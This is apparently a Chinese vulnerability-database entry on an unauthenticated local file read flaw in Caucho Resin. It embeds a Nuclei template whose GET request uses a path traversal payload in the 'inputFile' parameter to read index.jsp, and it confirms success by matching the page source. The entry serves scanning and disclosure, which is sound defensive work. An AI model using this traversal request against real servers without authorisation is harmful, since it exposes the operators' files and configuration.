resin-inputfile-fileread: Caucho Resin LFR

日期: 2025-08-01 | 影响软件: Caucho Resin LFR | POC: 已公开

漏洞描述

A vulnerability in Caucho Resin allows remote unauthenticated users to utilize the 'inputFile' variable to include the content of locally stored files and disclose their content.

PoC代码[已公开]

id: resin-inputfile-fileread

info:
  name: Caucho Resin LFR
  author: princechaddha
  severity: high
  description: A vulnerability in Caucho Resin allows remote unauthenticated users to utilize the 'inputFile' variable to include the content of locally stored files and disclose their content.
  reference:
    - https://blkstone.github.io/2017/10/30/resin-attack-vectors/
  metadata:
    max-request: 1
  tags: resin,caucho,lfr

http:
  - method: GET
    path:
      - "{{BaseURL}}/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %"
        part: body
# digest: 4a0a0047304502201cb650eef021607ecc553af0b7662855a67ccb41d92d0c08959ea9eac7641cb50221009bccd4d9e94040c656b6a6f1698ef9fb8dad5dfcc2ed39a2b69a90080e3fad19:922c64590222798bb761d5b6d8e72950